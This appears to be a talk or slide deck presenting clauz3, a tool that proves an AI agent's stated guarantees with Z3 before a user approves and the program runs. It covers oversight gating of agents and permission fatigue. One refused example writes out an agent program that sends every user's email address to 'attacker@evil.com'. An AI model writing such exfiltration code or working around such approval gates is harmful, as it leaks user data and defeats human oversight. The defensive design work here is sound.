Asking users to consent to what an agent promises, not to a 200-line program they didn't read.
User: “Send a status email to bob@example.com about today's deploy.”
The agent emits a script, and the IDE asks the user to approve that:
import os, smtplib
from email.message import EmailMessage
def send(addr: str, body: str) -> None:
msg = EmailMessage()
msg["From"] = os.environ.get("FROM_ADDR", "ops@example.com")
msg["To"] = addr
msg["Subject"] = "Deploy update"
msg.set_content(body)
with smtplib.SMTP_SSL(os.environ["SMTP_HOST"]) as s:
s.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
s.send_message(msg)
changes = os.popen("git log --oneline -n 10").read()
body = f"Deploy notes:\n\n{changes}"
recipients = ["bob@example.com"] + os.environ.get("CC_LIST", "").split(",")
for r in recipients:
if r.strip():
send(r.strip(), body)
┌──────────────────────────────────────────────────────────────────┐
│ Tool wants to run the script above. Allow this? [y/N] │
└──────────────────────────────────────────────────────────────────┘
> User: y (eighth prompt this session)
The intent — "email Bob about the deploy" — is somewhere in there.
So is whatever $CC_LIST resolves to, and whatever
git log happens to print today. There is no
declarative thing to consent to.
y to everything, or --dangerously-skip-permissions
Not “approve this 200-line program?”
But: will this email anyone other than Bob?
~/.ssh?These are contracts, not code reviews. They are small, declarative, and checkable.
A constraint solver from Microsoft Research. Answers questions like:
Given: x > 5 and x < 3
Z3: unsat — no value of x satisfies both.
Given: addr ∈ ["bob@example.com"]
and the program calls send_email(addr)
with addr = "ann@example.com"
Z3: sat — counterexample: addr = "ann@example.com"
You don't write Z3 directly. You compile high-level constraints into it and ask: is there any way for the program to violate them?
deal.readthedocs.io — a contract library for Python.
import deal
@deal.pre(lambda addr, msg: "@" in addr)
@deal.has("trusted")
@deal.post(lambda result: result is None)
def send_email(addr: str, msg: str) -> None:
...
@deal.pre — precondition (checked on call)@deal.post — postcondition (checked on return)@deal.has(...) — declares a side-effect categoryWe want the same checks, discharged before any effect runs.
One agentic tool call: the agent writes the code, the gate proves the guarantees, you approve the guarantees (not the code), then it runs.
Read deal's decorators statically, before any effect fires.
# trusted layer (audited; the assumptions)
@deal.pre(lambda addr, msg: "@" in addr)
@deal.has("trusted")
def send_email(addr: str, msg: str) -> None: ...
# agent code (untrusted; the guarantees)
import clauz3
from tools.email.trusted import contracts as emails
@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
send_email("bob@example.com", "hi")
The prover compiles the guarantee into Z3 constraints and asks: any execution that violates it?
| Role | Writes | Trusted for |
|---|---|---|
| User | nothing | the final decision; consents to a contract, never reads or runs code |
| Agent | an ad-hoc program + @clauz3.guarantee(...) claims |
nothing — every claim must be proved |
| Trusted Layer Engineer | the trusted layer: effects + contract vocabulary | everything; this is the root of trust |
Classic assume / guarantee reasoning. The TLE defines the assumptions; the agent states guarantees; the prover does the rest.
The TLE writes this once. The agent and prover both read it.
# tools/email/trusted/effects.py
@deal.pre(lambda addr, msg: "@" in addr, message='addr must contain "@"')
@deal.has("trusted")
def send_email(addr: str, msg: str) -> None:
...
# tools/email/trusted/contracts.py
Email = effect("send_email")
@contract
def only(addresses: list[str]) -> ContractSpec:
return Email.all(lambda e: e.addr in addresses)
@contract
def unique_recipients() -> ContractSpec:
return Email.distinct(lambda e: e.addr)
The user types something like:
The agent (an LLM) emits this program. The user does not read it.
import clauz3
from tools.email.trusted import contracts as emails
from tools.email.trusted.effects import send_email
@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
send_email("bob@example.com", "Report is ready")
The decorator is the agent's claim about what the program will do.
The body of main() is what it actually does. The prover's job
is to check those agree.
The agent cannot import the trusted effect and call it directly. It has
one allowed path: pipe the program to clauz3 run.
$ cat plan.py | clauz3 run
prove ✓ main: proved! assertion, guarantee
submit → approval-service at 127.0.0.1:8765
request_id = clr_ab18711b7319
wait (pending user decision...)
The agent's harness allowlists clauz3 * only. Every other
side-effect-capable command is denied. The agent cannot bypass the
user.
The approval service shows up in the user's browser:
───────────────────────────────────────────────────────────
Request clr_ab18711b7319 [pending]
Target main Coverage covered
───────────────────────────────────────────────────────────
Guarantees
• emails.only(['bob@example.com'])
User decision
Pending user decision.
[ feedback / reason …………………………………………………………… ]
[ Approve ] [ Reject contract ] [ Need more info ] [ Reject ]
Coverage
✓ email: covered
▸ Show source (collapsed; rarely opened)
▸ Raw record JSON (collapsed; for the auditor)
───────────────────────────────────────────────────────────
The contract is the unit of consent. Show source is right there for the rare audit, but it's not what the user is being asked to authorize.
The user clicks Approve. The runner unblocks, receives a
receipt, and only now executes main().
decision approved_once
receipt local-clr_ab18711b7319
execute ✓ send_email("bob@example.com", "Report is ready")
done.
PROVED the guarantee held against every branch before the user was asked. The user only had to consent to one declarative claim.
@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
send_email("ann@example.com", "Report is ready")
$ cat plan.py | clauz3 run
prove ✗ main: failed guarantee
counterexample: addr = "ann@example.com"
submit (not submitted)
REFUSED The approval service never sees
this request. The user is not bothered. send_email is never
called.
@clauz3.guarantee(bank.max_spend(5))
def main() -> None:
withdraw("checking", 2)
withdraw("checking", 3)
PROVED sum is exactly 5, so sum ≤ 5 holds.
@clauz3.guarantee(bank.max_spend(5))
def main() -> None:
withdraw("checking", 2)
withdraw("checking", 4)
REFUSED sum is 6.
The prover unrolls the loop symbolically and binds row.email to a column of a schema.
@clauz3.guarantee(emails.addresses_from(UserRow, "email"))
@clauz3.guarantee(emails.count_at_most(100))
def main() -> None:
for row in db_query("users", where={"consented": True}):
send_email(row.email, "Newsletter is out!")
PROVED every recipient is symbolically the email column of a UserRow.
def main() -> None:
for row in db_query("users"):
send_email("attacker@evil.com", row.email) # leak
REFUSED recipient is a literal, not a column.
┌────────────────────────────────────────┐
│ Agent writes program + guarantees │
└──────────────────┬─────────────────────┘
│ clauz3 run
▼
┌────────────────────────────────────────┐
│ Static prover · Z3 │
│ Discharges every @clauz3.guarantee │
└──────────────────┬─────────────────────┘
│ if and only if proved
▼
┌────────────────────────────────────────┐
│ Approval service (user-controlled) │
│ Shows contracts, not code; records │
│ decision + receipt │
└──────────────────┬─────────────────────┘
│ if approved
▼
┌────────────────────────────────────────┐
│ Program executes; trusted effects fire │
└────────────────────────────────────────┘
The TLE declares what an agent should promise about a domain it uses.
# tools/email/trusted/policy.py
required = [] # must be present, or proof fails
recommended = ["only", "unique_recipients"] # missing → UI badge, not block
The approval UI surfaces the gap:
Coverage
── email: recommended_gap
missing recommended: unique_recipients
Catches "the agent didn't lie, but also didn't promise anything useful."
Static proof is the default, not the only mode.
emails.no_guarantees() or leave a
domain uncovered.clauz3 prove — discharge guarantees on an entry programclauz3 run — prove · approve · executeclauz3 approval-service — localhost UI, REST endpointsclauz3 install — copy a trusted layer into another projectemail, bank, email-from-dbclauz3 run — beyond
the current import-restricted runner.Layering on these projects, not replacing them.
github.com/normalform-ai/clauz3Questions?